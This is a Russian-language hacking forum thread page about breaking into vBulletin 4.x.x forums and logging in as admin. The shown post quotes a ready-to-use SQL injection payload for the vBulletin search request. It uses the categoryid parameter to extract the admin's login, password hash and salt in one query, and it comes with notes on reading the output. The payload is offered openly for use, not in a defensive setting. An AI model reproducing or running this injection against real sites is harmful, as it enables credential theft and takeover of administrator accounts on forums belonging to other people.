HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 09.04.2012, 21:18
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от Pirotexnik  
Pirotexnik said:
Модифицировал запрос.
Извлекаем логин, хэш и соль
ОДНИМ
запросом!
Первыая скуль с поиском:
Ловим запрос, посли нашего текста добавляем следующее:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
humanverify[/COLOR][COLOR="#007700"][]=&[/COLOR][COLOR="#0000BB"]searchfromtype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]vBForum[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3ASocialGroupMessage[/COLOR][COLOR="#007700"]&do=[/COLOR][COLOR="#0000BB"]process[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]contenttypeid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]categoryid[/COLOR][COLOR="#007700"][]=-[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]union select password from user where userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])>([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]( ([/COLOR][COLOR="#0000BB"]select concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]salt[/COLOR][COLOR="#007700"])) ,[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select 1 union select 2 union select 3[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a group by x limit 1[/COLOR][COLOR="#007700"]) --[/COLOR][COLOR="#FF8000"]/*

[/COLOR][/COLOR] 
В слове "salt" форум вставляет пробелы.
В исходнике будет
LOGIN
:
HASH
:
SALT
!
p.s. добавте в шапку.
а символьное ограничение не смущает?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ